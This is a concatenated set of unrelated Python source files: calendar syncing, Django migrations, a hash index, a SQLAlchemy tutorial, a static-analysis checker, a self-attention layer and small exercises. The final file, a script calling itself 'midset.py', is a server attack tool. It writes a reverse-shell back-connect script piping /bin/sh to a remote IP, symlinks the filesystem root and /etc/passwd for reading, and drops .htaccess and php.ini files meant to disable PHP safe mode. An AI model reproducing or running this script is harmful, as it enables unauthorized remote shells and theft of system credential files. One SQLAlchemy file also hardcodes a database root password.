with open('events/current.txt', 'r') as calendar_ids:
for _id in calendar_ids:
print(_id)
remove_event(service,_id.strip())
with open('events/current.txt', 'w') as calendar_ids:
for event in events:
event = service.events().insert(calendarId='primary', body=event).execute()
calendar_ids.write(event.get('id')+'\n')
if __name__ == '__main__':
main()
|
from .parse import parse_config
|
import multiprocessing
import time
testNUM = 0;
def worker(interval,lock):
n = 5;
while n > 0:
print("The time is {0}".format(time.ctime()));
time.sleep(interval);
n -= 1;
testNUM += 1;
print("testNUM is %d"%(testNUM));
if __name__ == "__main__":
lock = multiprocessing.Lock();
for x in range(0,2):
p = multiprocessing.Process(target = worker, args = (1,lock));
p.start();
print("p.pid:", p.pid);
print("p.name:", p.name);
print("p.is_alive:", p.is_alive());
|
print('mod_1 loaded!')
def mod_1_pr():
print('This is a function in mod_1!')
|
import numpy as np
a = np.array([1, 2, 3], dtype = complex)
print(a)
|
# -*- coding: utf-8 -*-
import SocketServer
from StringIO import StringIO
from avro import schema
from avro.datafile import DataFileReader
from avro.io import DatumReader
FILE_SCHEMA = schema.parse(open("../../avro/herring-box-data.avpc").read())
OUT_DIRECTORY = "backup/"
fileDict = dict()
class MyTCPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(8024).strip()
data = StringIO(data)
reader = DataFileReader(data, DatumReader())
for fileData in reader:
id = fileData['id']
data = fileData['data']
print fileData
if not fileDict.has_key(id):
fileDict[id] = open("./" + id, "w")
f = fileDict[id]
f.write(data)
f.flush()
reader.close()
if __name__ == "__main__":
HOST, PORT = "localhost", 9999
server = SocketServer.TCPServer((HOST, PORT), MyTCPHandler)
server.serve_forever()
print "server started"
|
# Generated by Django 2.2.6 on 2019-11-25 08:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('work', '0041_auto_20191125_0813'),
]
operations = [
migrations.RenameModel(
old_name='Headline',
new_name='Resolution',
),
]
|
import heapq
import threading
from six import BytesIO
from six.moves import map
import numpy
from smqtk.algorithms.nn_index.hash_index import HashIndex
from smqtk.representation import get_data_element_impls
from smqtk.utils import merge_dict, plugin
from smqtk.utils.bit_utils import (
bit_vector_to_int_large,
int_to_bit_vector_large,
)
from smqtk.utils.metrics import hamming_distance
class LinearHashIndex (HashIndex):
"""
Basic linear index using heap sort (aka brute force).
Hash codes are stored as large integer values.
"""
@classmethod
def is_usable(cls):
return True
@classmethod
def get_default_config(cls):
"""
Generate and return a default configuration dictionary for this class.
This will be primarily used for generating what the configuration
dictionary would look like for this class without instantiating it.
By default, we observe what this class's constructor takes as arguments,
turning those argument names into configuration dictionary keys. If any
of those arguments have defaults, we will add those values into the
configuration dictionary appropriately. The dictionary returned should
only contain JSON compliant value types.
It is not be guaranteed that the configuration dictionary returned
from this method is valid for construction of an instance of this class.
:return: Default configuration dictionary for the class.
:rtype: dict
"""
c = super(LinearHashIndex, cls).get_default_config()
c['cache_element'] = plugin.make_config(get_data_element_impls())
return c
@classmethod
def from_config(cls, config_dict, merge_default=True):
"""
Instantiate a new instance of this class given the configuration
JSON-compliant dictionary encapsulating initialization arguments.
This method should not be called via super unless an instance of the
class is desired.
:param config_dict: JSON compliant dictionary encapsulating
a configuration.
:type config_dict: dict
:param merge_default: Merge the given configuration on top of the
default provided by ``get_default_config``.
:type merge_default: bool
:return: Constructed instance from the provided config.
:rtype: LinearHashIndex
"""
if merge_default:
config_dict = merge_dict(cls.get_default_config(), config_dict)
cache_element = None
if config_dict['cache_element'] \
and config_dict['cache_element']['type']:
cache_element = \
plugin.from_plugin_config(config_dict['cache_element'],
get_data_element_impls())
config_dict['cache_element'] = cache_element
return super(LinearHashIndex, cls).from_config(config_dict, False)
def __init__(self, cache_element=None):
"""
Initialize linear, brute-force hash index.
:param cache_element: Optional data element to cache our index to.
:type cache_element: smqtk.representation.DataElement | None
"""
super(LinearHashIndex, self).__init__()
self.cache_element = cache_element
# Our index is the set of bit-vectors as an integers/longs.
#: :type: set[int]
self.index = set()
self._model_lock = threading.RLock()
self.load_cache()
def get_config(self):
c = self.get_default_config()
if self.cache_element:
c['cache_element'] = merge_dict(c['cache_element'],
plugin.to_plugin_config(
self.cache_element))
return c
def load_cache(self):
"""
Load from file cache if we have one
"""
with self._model_lock:
if self.cache_element and not self.cache_element.is_empty():
buff = BytesIO(self.cache_element.get_bytes())
self.index = set(numpy.load(buff))
def save_cache(self):
"""
save to file cache if configures
"""
with self._model_lock:
if self.cache_element and self.index:
if self.cache_element.is_read_only():
raise ValueError("Cache element (%s) is read-only."
% self.cache_element)
buff = BytesIO()
# noinspection PyTypeChecker
numpy.save(buff, tuple(self.index))
self.cache_element.set_bytes(buff.getvalue())
def count(self):
with self._model_lock:
return len(self.index)
def _build_index(self, hashes):
"""
Internal method to be implemented by sub-classes to build the index with
the given hash codes (bit-vectors).
Subsequent calls to this method should rebuild the current index. This
method shall not add to the existing index nor raise an exception to as
to protect the current index.
:param hashes: Iterable of descriptor elements to build index
over.
:type hashes: collections.Iterable[numpy.ndarray[bool]]
"""
with self._model_lock:
new_index = set(map(bit_vector_to_int_large, hashes))
self.index = new_index
self.save_cache()
def _update_index(self, hashes):
"""
Internal method to be implemented by sub-classes to additively update
the current index with the one or more hash vectors given.
If no index exists yet, a new one should be created using the given hash
vectors.
:param hashes: Iterable of numpy boolean hash vectors to add to this
index.
:type hashes: collections.Iterable[numpy.ndarray[bool]]
"""
with self._model_lock:
self.index.update(set(map(bit_vector_to_int_large, hashes)))
self.save_cache()
def _remove_from_index(self, hashes):
"""
Internal method to be implemented by sub-classes to partially remove
hashes from this index.
:param hashes: Iterable of numpy boolean hash vectors to remove from
this index.
:type hashes: collections.Iterable[numpy.ndarray[bool]]
:raises KeyError: One or more hashes provided do not match any stored
hashes. The index should not be modified.
"""
with self._model_lock:
h_int_set = set(map(bit_vector_to_int_large, hashes))
# KeyError if any hash ints are not in our index map.
for h in h_int_set:
if h not in self.index:
raise KeyError(h)
self.index = self.index - h_int_set
self.save_cache()
def _nn(self, h, n=1):
"""
Internal method to be implemented by sub-classes to return the nearest
`N` neighbor hash codes as bit-vectors to the given hash code
bit-vector.
Distances are in the range [0,1] and are the percent different each
neighbor hash is from the query, based on the number of bits contained
in the query (normalized hamming distance).
When this internal method is called, we have already checked that our
index is not empty.
:param h: Hash code to compute the neighbors of. Should be the same bit
length as indexed hash codes.
:type h: numpy.ndarray[bool]
:param n: Number of nearest neighbors to find.
:type n: int
:return: Tuple of nearest N hash codes and a tuple of the distance
values to those neighbors.
:rtype: (tuple[numpy.ndarray[bool]], tuple[float])
"""
with self._model_lock:
h_int = bit_vector_to_int_large(h)
bits = len(h)
#: :type: list[int|long]
near_codes = \
heapq.nsmallest(n, self.index,
lambda e: hamming_distance(h_int, e)
)
distances = map(hamming_distance, near_codes,
[h_int] * len(near_codes))
return [int_to_bit_vector_large(c, bits) for c in near_codes], \
[d / float(bits) for d in distances]
|
__author__ = 'Elisabetta Ronchieri'
import commands
import os
from tstorm.utils import utils
class Grep:
def __init__(self, fn='/var/log/storm/storm-frontend-server.log'):
self.ifn = fn
self.cmd = {
'name':'grep'
}
self.ipt_strings = 'Cannot add or update a child row: a foreign key constraint fails'
self.otpt = {
'status':''}
def get_command(self):
a = self.cmd['name'] + '"' + self.ipt_strings + '" ' + self.ifn
return a
def run_command(self):
a=()
if utils.cmd_exist(self.cmd['name']):
a=commands.getstatusoutput(self.get_command())
return a
def get_output(self):
a=self.run_command()
if a[0] == 0:
self.otpt['status'] = 'PASS'
else:
self.otpt['status'] = 'FAILURE'
return self.otpt
|
# Generated by Django 3.2.7 on 2021-09-22 17:09
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='targetfile',
name='file_name',
),
migrations.RemoveField(
model_name='targetfile',
name='file_type',
),
migrations.AddField(
model_name='targetfile',
name='file_uri',
field=models.URLField(default=None),
),
migrations.AlterField(
model_name='targetfile',
name='description',
field=models.TextField(default=''),
),
migrations.AlterField(
model_name='targetfile',
name='identifier',
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='targetfile',
name='size_bytes',
field=models.IntegerField(default=0),
),
]
|
""" calcular el factorial de
un numero
"""
def factorial(n):
if n==0:
return 1
else:
res=n
for conta in range(1,n):
res=res*conta
return res
print(factorial(0)) #1
print(factorial(1)) #1
print(factorial(3)) #6
print(factorial(5)) #120
print(factorial(9)) #362,880
|
import pymysql
pymysql.install_as_MySQLdb()
# 默认情况下, sqlalchemy使用mysqldb连接数据库, python2中会安装mysqldb的包, python3中不会安装, 可安装pymysql, 里面切成mysqldb()
from sqlalchemy import create_engine, MetaData, Table, Column, Integer, String, ForeignKey
DB_CONNECT_STRING = "mysql://root:mysql@127.0.0.1:3306/sqlalchemy_study"
engine = create_engine(DB_CONNECT_STRING, echo=True)
# engine = create_engine(DB_CONNECT_STRING, echo=True) # echo=True, 打印调试信息
metadata = MetaData(engine) # 创建 MetaData 时绑定了引擎
# print(metadata)
# user_table = Table('user', metadata,
# Column('id', Integer, primary_key=Table),
# Column('name', String(50)),
# Column('fullname', String(100))
# )
#
# address_table = Table('address', metadata,
# Column('id', Integer, primary_key=Table),
# Column('user_id', None, ForeignKey('user.id')),
# Column('email', String(128), nullable=False)
# )
#
# metadata.create_all() # 会自动检查表是否存在
# 若创建metadata时不传入engine, 此处应该写成metadata.create_all(engine)
# 除了metadata.create_all()外, Table自己也有create方法:
# Table对象.create(bind=引擎, checkfirst=False)
# user_table.create(checkfirst=False) # bind参数一般指引擎,绑定Metadata对象可忽略 checkfirst为True时, 如果表存在, 不报错, 什么也不做; 为False时会引发异常
# address_table.create(checkfirst=False)
# 导入表, 表已经存在, 不再创建表了, 使用参数autoload=True
user_table = Table('user', metadata, autoload=True)
# print('user' in metadata.tables) # 查看是否导入成功, True
# print('address' in metadata.tables) # False
# print([c.name for c in user_table.columns]) # 查看列的名字
# 反射功能, 如果被反射的表外键引用了另一个表, 那么被引用的表也会一并被反射. 比如只反射address表, user表也一并被反射了
address_table = Table('address', metadata, autoload=True)
# print('user' in metadata.tables) # True
# 插入数据
# 插入数据之前, 必须要有表对象, 不管是新创建的还是通过反射导入的
# ins = user_table.insert() # 返回Insert对象所对应的sql语句
# print(ins)
# ins = ins.values(id="1",name='zhangsan',fullname='nigulasiZhangSan')
# 执行插入数据
# conn = engine.connect()
# result = conn.execute(ins)
# 执行多条语句
# 把参数通过execute()方法传进去
ins = user_table.insert()
conn = engine.connect()
# conn.execute(ins, name="zhangsan", fullname="nigulasi zhaosi")
# 一次插入多条记录, 传入一个字典列表(每个字典的键必须一致)给execute()即可
# conn.execute(address_table.insert(),[
# {'user_id':1, "email": "sprinfall@gmail.com"},
# {'user_id':1, "email": "sprinfall@hotmail.com"},
# ])
# 查询数据
cur = conn.execute('select * from address;')
res = cur.fetchall()
print(res)
|
#!/usr/bin/env python3
from ..lib import keyword_utils
from ..feature_analyzer.casual_analyzer import get_chkval_cond
'''
"causality": {
"pre.call": {
"func_name": {
used_as_arg: false,
share_argument: true,
}, ...
}
"post.call": {
"func_name": {
used_as_arg(use_target_as_arg): true,
share_argument: false,
}, ...
}
}
'''
def check_causality(target, causal_feature_map, complete_feature, doc_feature={}):
feature = complete_feature['causality']
alarm_text = ""
pre_functions = causal_feature_map['pre_functions']
post_functions = causal_feature_map['post_functions']
doc_pre_functions = []
doc_post_functions = []
if "causality" in doc_feature:
doc_pre_functions = doc_feature['causality']['pre']
doc_post_functions = doc_feature['causality']['post']
# Skip the pre function if the function is known as usual pre functions.
if keyword_utils.is_subsequent(target):
alarm_text += check_causal_feature(target, feature, "pre.call", pre_functions, doc_pre_functions)
if not is_error_handling(complete_feature, doc_feature):
# Skip the post function if the function is known as usual post functions.
# And lazily ignore it if the return is not used at all...
if not keyword_utils.is_post(target) and ret_is_used(complete_feature):
chkval_cond = get_chkval_cond(complete_feature)
alarm_text += check_causal_feature(target,
feature,
"post.call",
post_functions,
doc_post_functions,
chkval_cond=chkval_cond)
# Record double-free-related cases.
elif len(feature['post.call']) == 1 and keyword_utils.is_post(target) \
and target in feature['post.call'] and target not in feature['pre.call']:
alarm_text += f"Potential: duplicated call of {target} in post.call. "
return True, alarm_text
def is_global(complete_feature=None):
if complete_feature != None:
if 'retval' in complete_feature and 'ctx' in complete_feature['retval']:
if complete_feature['retval']['ctx']['indir_returned'] \
or complete_feature['retval']['ctx']['returned'] \
or complete_feature['retval']['ctx']['stored_not_local']:
return True
return False
def ret_is_used(complete_feature=None):
if complete_feature != None and not is_global(complete_feature):
if 'retval' in complete_feature and 'ctx' in complete_feature['retval']:
if complete_feature['retval']['check']['checked'] or \
complete_feature['retval']['check']['indir_checked'] or \
complete_feature['retval']['ctx']['derefed_read'] or \
complete_feature['retval']['ctx']['derefed_write'] or \
complete_feature['retval']['ctx']['used_in_bin'] or \
complete_feature['retval']['ctx']['used_in_call']:
return True
else: # no return..
return True
return False
def check_causal_feature(target, feature, causal_type, functions, doc_functions, chkval_cond=None):
if ignore_causal(target, causal_type, feature[causal_type]):
return ""
alarm_text = ""
for causal_func in functions:
# If the frequency is 1
frequency = functions[causal_func] if causal_type == "pre.call" \
else functions[causal_func][0]
if frequency == 1:
continue
# For post.call # chkval_cond != "no_check" and
if chkval_cond != None and functions[causal_func][1] != {}:
if chkval_cond not in functions[causal_func][1]:
continue
# Consider the direct variants
for func in feature[causal_type]:
if causal_func in func:
causal_func = func
break
# Check whether have the causal function
if causal_func not in feature[causal_type]:
alarm_text += f"Lack {causal_type}: {causal_func}. "
# If there are many classes, then we only detect the most-frequent
if len(functions) > 2:
break
if alarm_text == "" and len(doc_functions) > 0:
has_doc_func = False
for doc_func in doc_functions:
if doc_func in feature[causal_type]:
has_doc_func = True
if not has_doc_func:
alarm_text += f"Lack one of them in {causal_type}: {doc_functions}. (by documents spec.) "
return alarm_text
def ignore_causal(target, causal_type, functions):
for func in functions:
if causal_related(func, causal_type) \
and has_same_prefix(target, func, causal_type):
return True
return False
def causal_related(func_name, causal_type):
if causal_type == "pre.call":
if keyword_utils.is_pre(func_name):
return True
else:
if keyword_utils.is_post(func_name):
return True
return False
def has_same_prefix(target, causal_func, causal_type):
length = len(target) if len(target) > len(causal_func) else len(target)
idx = 0
if causal_type == "post.call":
if '_' in target:
idx = len(target) - target[::-1].index('_') - 1
else:
for idx in range(length):
if not keyword_utils.is_pre_seq(target[idx:]):
break
if idx < length:
if keyword_utils.is_pre_seq(target[idx:]) == keyword_utils.is_post(causal_func[idx:]) \
or (idx > 0 and target[:idx] == causal_func[:idx]):
return True
else:
if '_' in target:
idx = len(target) - target[::-1].index('_') - 1
else:
for idx in range(length):
if not keyword_utils.is_subsequent(target[idx:]):
break
if idx < length:
if keyword_utils.is_subsequent(target[idx:]) == keyword_utils.is_pre(causal_func[idx:]) \
or (idx > 0 and target[:idx] == causal_func[:idx]):
return True
return False
def is_error_handling(complete_feature, doc_feature):
if "ret" not in doc_feature:
return False
if "success" not in doc_feature['ret']['cond'] \
and "fail" not in doc_feature['ret']['cond']:
return False
if 'retval' in complete_feature:
ret_check = complete_feature['retval']['check']
if ret_check['checked'] and not ret_check['compared_with_non_const'] \
and not ret_check['indir_checked']:
retval = ret_check['compared_with_const']
retcond = ret_check['check_cond']
if retval in doc_feature['ret']['value']:
idx = doc_feature['ret']['value'].index(retval)
cond = doc_feature['ret']['cond'][idx]
if (cond == "success" and retcond in ["ne", "lt", "gt"]) \
or (cond == "fail" and retcond in ["eq", "le", "ge"]):
return True
return False
|
from typing import Tuple
from torch import nn, Tensor
from torch.nn import MultiheadAttention
from parseridge.parser.modules.add_and_norm_layer import AddAndNormLayer
from parseridge.parser.modules.data_parallel import Module
class SelfAttentionLayer(Module):
def __init__(self, model_size: int, num_heads: int, **kwargs):
super().__init__(**kwargs)
self.input_size = self.output_size = model_size
self.num_heads = num_heads
self.multihead_attention = MultiheadAttention(
embed_dim=self.input_size, num_heads=num_heads
)
self.attention_norm = AddAndNormLayer(model_size=self.input_size)
self.linear_layer = nn.Sequential(
nn.Linear(in_features=self.input_size, out_features=4 * self.input_size),
nn.ReLU(),
nn.Linear(in_features=4 * self.input_size, out_features=self.input_size),
)
self.linear_layer_norm = AddAndNormLayer(model_size=self.input_size)
def forward(self, sequence: Tensor, mask: Tensor) -> Tuple[Tensor, Tensor]:
# [Batch, Sequence, Embedding] -> [Sequence, Batch, Embedding]
sequence_by_sent = sequence.transpose(0, 1)
attention_output, attention_weights = self.multihead_attention(
query=sequence_by_sent,
key=sequence_by_sent,
value=sequence_by_sent,
key_padding_mask=mask,
)
# [Sequence, Batch, Embedding] -> [Batch, Sequence, Embedding]
attention_output = attention_output.transpose(0, 1)
attention_output = self.attention_norm(input=sequence, output=attention_output)
attention_output = self.linear_layer_norm(
input=attention_output, output=self.linear_layer(attention_output)
)
return attention_output, attention_weights
|
import random
aluno = [0, 1, 2, 3]
for x in range(4):
aluno[x] = input('Digite o {}º aluno: '.format(x + 1))
print('Foi sorteado(a) {}'.format(aluno[random.randint(0, 3)]))
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
a = 1
def x():
return 2
|
from django.shortcuts import render
from common.models import Injection, CRI, Prescription
def info(request):
"""Displays all medications in the db."""
inj = Injection.objects.all()
cri = CRI.objects.all()
pre = Prescription.objects.all()
return render(request, 'info/info.html', {'navbar': 'info',
'inj': inj,
'cri': cri,
'pre': pre})
# The following views get a specific medication based on a slug passed from the base info view.
def info_inj(request, slug):
inj = Injection.objects.get(slug=slug)
return render(request, 'info/rx.html', {'navbar': 'info',
'rx': inj})
def info_cri(request, slug):
cri = CRI.objects.get(slug=slug)
return render(request, 'info/rx.html', {'navbar': 'info',
'rx': cri})
def info_pre(request, slug):
pre = Prescription.objects.get(slug=slug)
return render(request, 'info/rx.html', {'navbar': 'info',
'rx': pre})
|
# Generated by Django 2.1.5 on 2019-01-18 07:34
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('advertisement', '0004_auto_20190116_1354'),
]
operations = [
migrations.RemoveField(
model_name='advertisement',
name='total_views',
),
migrations.RemoveField(
model_name='advertisement',
name='unique_views',
),
]
|
# def add(am1, am2):
# test_suite_matrix(am1, am2)
#
# length_outer = len(am1)
# length_inner = len(am1[0])
#
# result_matrix = []
# result_matrix = [[result_matrix for i in range(length_inner)] for j in range(length_outer)]
#
# for o in range(length_outer):
# for i in range(length_inner):
# result_matrix[o][i] = am1[o][i] + am2[o][i]
#
# print(result_matrix)
#
#
# def test_suite_matrix(m1, m2):
# assert len(m1) == len(m2)
# print("Test 1 Check")
def add(*am):
# test_suite_matrix(am)
print(am)
argument_len = len(am)
length_outer = len(am[0])
length_inner = len(am[0][0])
print(length_outer)
print(length_inner)
result_matrix = [[0 for i in range(length_inner)] for j in range(length_outer)]
for args in range(argument_len):
for o in range(length_outer):
for i in range(length_inner):
result_matrix[o][i] += am[args][o][i]
print(result_matrix)
#
# def test_suite_matrix(m1, m2):
# assert len(m1) == len(m2)
# print("Test 1 Check")
matrix1 = [[1, -2], [-3, 4]]
matrix2 = [[2, -1], [0, -1]]
matrix3 = [[-3, 3], [3, -3]]
add(matrix1, matrix2, matrix3)
matrix1 = [[1, -2, 3], [-4, 5, -6], [7, -8, 9]]
matrix2 = [[1, 1, 0], [1, -2, 3], [-2, 2, -2]]
add(matrix1, matrix2)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 10 16:26:36 2018
@author: andr
"""
import os
from datetime import datetime, timedelta
import numpy as np
import matplotlib.pyplot as plt
os.system("rm res_iter_coords.txt")
with open('0943_fk_start.par', 'r') as file:
lines = file.readlines()
ra = datetime.strptime(lines[1][11:-1], '%H:%M:%S')
dec = datetime.strptime(lines[2][11:-1], '%H:%M:%S')
for sec_ra in range(60):
for sec_dec in range(60):
ra += timedelta(seconds=sec_ra)
dec += timedelta(seconds=sec_dec)
lines[1] = 'RAJ ' + ra.strftime('%H:%M:%S') + ' 1' + '\n'
lines[2] = 'DECJ ' + dec.strftime('%H:%M:%S') + ' 1' + '\n'
with open('0943_fk.par', 'w') as file:
for line in lines:
file.write(line)
os.system("tempo 0943_fk.tim")
os.system("~/work/tempo/util/print_resid/./print_resid -mre > resid.ascii")
data = np.genfromtxt("resid.ascii").T
with open('res_iter_coords.txt', 'a') as file:
file.write(ra.strftime('%H:%M:%S') + ' ')
file.write(dec.strftime('%H:%M:%S') + ' ')
file.write(str(np.std(data[1])))
file.write('\n')
data = np.genfromtxt('res_iter_coords.txt').T
plt.close()
plt.plot(data[2])
plt.savefig('res_iter_coords.png', format='png', dpi=150)
|
''' Funciones '''
import math
# Module file: funciones.py
def detectaDiferenciaPosicion(p1, coords2):
'''Calcula la distancia radial entre un'''
puntoX, puntoY = coords2
if math.hypot((p1.x-puntoX),(p1.y-puntoY))<=p1.size:
return 1
else:
return 0
def sumaFuerzas(f1,f2):
'''Suma dos fuerzas xd'''
return [f1[0]+f2[0], f1[1]+f2[1]]
def addVectors(v1, v2):
''' Suma dos vectores en general, de la forma (r, theta) '''
r1, theta1 = v1
r2, theta2 = v2
x = math.cos(theta1) * r1 + math.cos(theta2) * r2
y = math.sin(theta1) * r1 + math.sin(theta2) * r2
theta = math.atan2(y, x)
r = math.hypot(x, y)
return [r, theta]
def transformaCartesiano(vector): # (r, theta)
'''El viento es mas facil representarlo en cartesiano'''
return [vector[0]*math.cos(vector[1]), -vector[0]*math.sin(vector[1])] # LLeva un - porque el sistema de ref esta al reve
def transformaAngular(vector):
return [math.hypot(vector[0], vector[1]), math.atan2(-vector[1], vector[0])]
|
import json
import hashlib
class My_iterator:
def __init__(self, file_name: str):
self.start = -1
with open(file_name, 'r', encoding='utf8') as file:
self.countries = json.load(file)
def __iter__(self):
return self
def __next__(self):
self.start += 1
if self.start == len(self.countries):
raise StopIteration
return self.countries[self.start]['name']['common']
if __name__ == '__main__':
list_countries = My_iterator('countries.json')
with open('res.txt', 'w', encoding='utf8') as file:
count = 0
for country in list_countries:
count += 1
file.write(f'{country} - https://ru.wikipedia.org/wiki/{country.replace(" ", "_")}\n')
def LineReader(filename: str):
with open(filename, 'r', encoding='utf8') as my_file:
while True:
line = my_file.readline()
if line:
yield hashlib.md5(line.encode('utf8')).hexdigest()
else:
break
for item in LineReader('res.txt'):
print(item)
|
from pico2d import * # C:\Users\enjcat\AppData\Local\Programs\Python\Python36\lib\site-packages\pico2d
import game_framework
import random
import game_world
import random
import Wepon
dicts = {0:Wepon.stick,1:Wepon.sword,2:Wepon.ice,3:Wepon.fire,4:Wepon.wand,5:Wepon.heal}
class Tower:
def __init__(self):
print("Creating..")
self.image = load_image('./res/popmap.png')
self.x = 150
self.y = 150
self.frame = 0
self.speed = 3
self.on = 0
def draw(self):
self.image.clip_draw(int(self.frame) * 200, 0, 200, 200, get_canvas_width()/2, get_canvas_height()/2)
def update(self):
if(self.on == 1):
self.frame = self.frame + 0.2
if self.frame >= 4:
self.on = 0
rand = random.randint(0,100)
if(rand < 40):
game_world.add_object(dicts[5](),game_world.layer_obstacle)
elif(rand < 65):
game_world.add_object(dicts[0](),game_world.layer_obstacle)
elif(rand < 85):
game_world.add_object(dicts[1](),game_world.layer_obstacle)
elif(rand < 92):
game_world.add_object(dicts[2](),game_world.layer_obstacle)
elif(rand < 99):
game_world.add_object(dicts[3](),game_world.layer_obstacle)
elif(rand < 100):
game_world.add_object(dicts[4](),game_world.layer_obstacle)
if(self.on == 0 and self.frame > 0):
self.frame -= 0.2
def pop(self):
self.on = 1
|
from urllib.request import urlopen
from bs4 import BeautifulSoup
html = urlopen("http://pythonscraping.com/pages/page1.html")
def main():
"""
Starting out with BeautifulSoup
:return:
"""
obj = BeautifulSoup(html.read(), "lxml")
print(obj.h1)
return None
if __name__ == "__main__":
main()
|
import requests as r
import json
import time
URL='http://127.0.0.1:8001/api/studios'
def bodrder():
print("\n-----------------------")
print('Просмотр всех записей;')
print(r.get(URL).text)
bodrder()
print('Просмотр конкретной записи(успешно)')
print(r.get(URL+'/7').text)
bodrder()
print('Просмотр конкретной записи(неуспешно-такого пользователя нет)')
print(r.get(URL+'100500').text)
bodrder()
print('Сортировка по имени по убываню')
print(r.get(URL,params={'order':'d'}).text)
bodrder()
print('Сортировка по имени по возрастанию')
print(r.get(URL,params={'order':'a'}).text)
bodrder()
print('Фильтрация по всем полям')
print(r.get(URL,params={'filter':'Дубай'}).text)
bodrder()
print('Пагинация ')
print(r.get(URL,params={'pagination':'5'}).text)
bodrder()
print('Средняя оценка фильмов студий ')
print(r.get(URL+'/avg_rate').text)
bodrder()
print('Добавление студии-ошибка(ничего не передаем же)')
print(r.post(URL).text)
bodrder()
print('Добавление студии(всё хорошо)')
print(r.post(URL, json={'name':'9898','country':'5','city':'5'}).text)
bodrder()
print('Обновление записи')
print(r.put(URL+'/1',json={'name':'6','country':'5','city':'5'}).text)
bodrder()
print('Удаление студии(Таблицы связаны,поэтому 406)')
print(r.delete(URL+'/1').text)
bodrder()
|
#!/usr/bin/env python
import numpy as np
import cv2
import cv2.cv as cv
from video import create_capture
from common import clock, draw_str
import facedetect as fd
import Train_Common as tc
help_message = '''
USAGE: facedRec_LBP.py [--cascade <cascade_fn>] [--nested-cascade <cascade_fn>] [--model-name <ModelName>] [--label-name <LabelName>]
'''
out = cv2.VideoWriter('output.avi', -1, 20.0, (640,480))
if __name__ == '__main__':
import sys, getopt
args, video_src = getopt.getopt(sys.argv[1:], '', ['cascade=', 'nested-cascade=', 'model-name=', 'label-name='])
try: video_src = video_src[0]
except: video_src = 0
args = dict(args)
cascade_fn = args.get('--cascade', "haarcascades/haarcascade_frontalface_alt.xml")
nested_fn = args.get('--nested-cascade', "haarcascades/haarcascade_eye.xml")
ModelName = args.get('--model-name', "Model_default.yml")
LabelName = args.get('--label-name', "Label_default.txt")
cascade = cv2.CascadeClassifier(cascade_fn)
nested = cv2.CascadeClassifier(nested_fn)
reconizer = cv2.createLBPHFaceRecognizer()
reconizer.load(ModelName)
cam = create_capture(video_src, fallback='synth:bg=../cpp/lena.jpg:noise=0.05')
Name, Labels = tc.Read_List_Label(LabelName)
while True:
ret, img = cam.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray = cv2.equalizeHist(gray)
t = clock()
rects = fd.detect(gray, cascade)
vis = img.copy()
fd.draw_rects(vis, rects, (0, 255, 0))
for x1, y1, x2, y2 in rects:
roi = gray[y1:y2, x1:x2]
vis_roi = vis[y1:y2, x1:x2]
subrects = fd.detect(roi.copy(), nested)
fd.draw_rects(vis_roi, subrects, (255, 0, 0))
label, distance = reconizer.predict(roi)
draw_str(vis, (x1, y2+15), '%.1f' % (distance))
if(distance < 300):
draw_str(vis, (x1, y2), '%s' % (Name[label]))
else:
draw_str(vis, (x1, y2), '%s' % ("Known H"))
dt = clock() - t
draw_str(vis, (20, 20), 'time: %.1f ms' % (dt*1000))
cv2.imshow('facedetect', vis)
#cv2.imwrite("x121_0.png", vis)
# write the flipped frame
out.write(vis)
if 0xFF & cv2.waitKey(5) == 27:
break
cv2.destroyAllWindows()
cam.release()
out.release()
|
#!/usr/bin/python3
import sys, socket, os, subprocess
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
symlink = 'ln -s / 1.txt'
pwd = ('pwd')
create = ('mkdir sym')
cd = ('cd sym')
passwd = ('ln -s /etc/passwd passwd.txt')
print "\n|---------------------------------------------|"
print "| ##~ Mid Set LoC ReAd |"
print "| 2015 midset.py |"
print "| - Linux server read files |"
print "| Read /etc/passwd >> passwd.txt |"
print "| GreeTz : HsN,Hiso,marco,vir,oudouz,ked,D3v |"
print "| All Rights Reserved @ Mid-Set |"
print "| C0ntact : http://fb.com/midset00 |"
print "|----------------------------------------------|\n"
print "|----------------------------------------------|\n"
def sym():
htacess = open ('.htaccess' , 'w')
inputx = 'Options Indexes FollowSymLinks \nDirectoryIndex ssssss.htm \nAddType txt .php \nAddHandler txt .php'
htacess.write(inputx)
phpini = open ('php.ini', 'w')
input2 = ('safe_mode = off disabled_functions = none')
phpini.write(input2)
os.system(SysCls)
os.system(cd)
os.system(symlink)
os.system(passwd)
os.system(pwd)
def BackConnect():
back = open ('back.py' , 'w')
inback = '''ip = sys.argv[1] \n port2 = int(sys.argv[2]) \nsocket.setdefaulttimeout(60) \ndef outside(): \ntry: \nsok = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \nsok.connect((ip,port2)) \nsok.send('roote.dz@gmail.com@gmail.com \nmidset007.net \n') \nos.dup2(sok.fileno(),0) \nos.dup2(sok.fileno(),1) \nos.dup2(sok.fileno(),2) \nos.dup2(sok.fileno(),3) \nshell = subprocess.call(["/bin/sh","-i"]) \nexcept socket.timeout: \nprint ("[!] Connection timed out") \nexcept socket.error: \nprint ("[!] Error while connecting") \noutside() '''
back.write(inback)
os.system('chmod 755 back.py')
print('''
Welcome to my script :) :)
please choose one of these options :
0 - quit program
1- BackConnect (create a back connect file)
2- create Symlink to whole server
3- create Symlink to a file
PS : * if you used choices 2 or 3 we will bypass safe_mode in server
* a passwd.txt file will created cointain /etc/passwd file
* you will find files in "sym"
if you are using this Script from the web, you can BackConnect by typing
python SymConnect.py [ip] [port]
example: python SymConnect 192.168.0.0 77
''')
ann = raw_input("Mid-Set >>> ")
all = 0
if ann == '1' :
BackConnect()
ip = input ('enter you ip address')
port = input ('enter the port to listennning')
os.system('python back.py %s %s') % (ip, port)
print('# Connecting...')
elif ann == '2':
sym()
print('the server symlink created successfully in 1.txt ')
print('--------------------------------------------------')
elif ann == '3':
directory = input ('Enter the file you would create symlink for>>>')
print('~~~~~~~~~~~~~~~~')
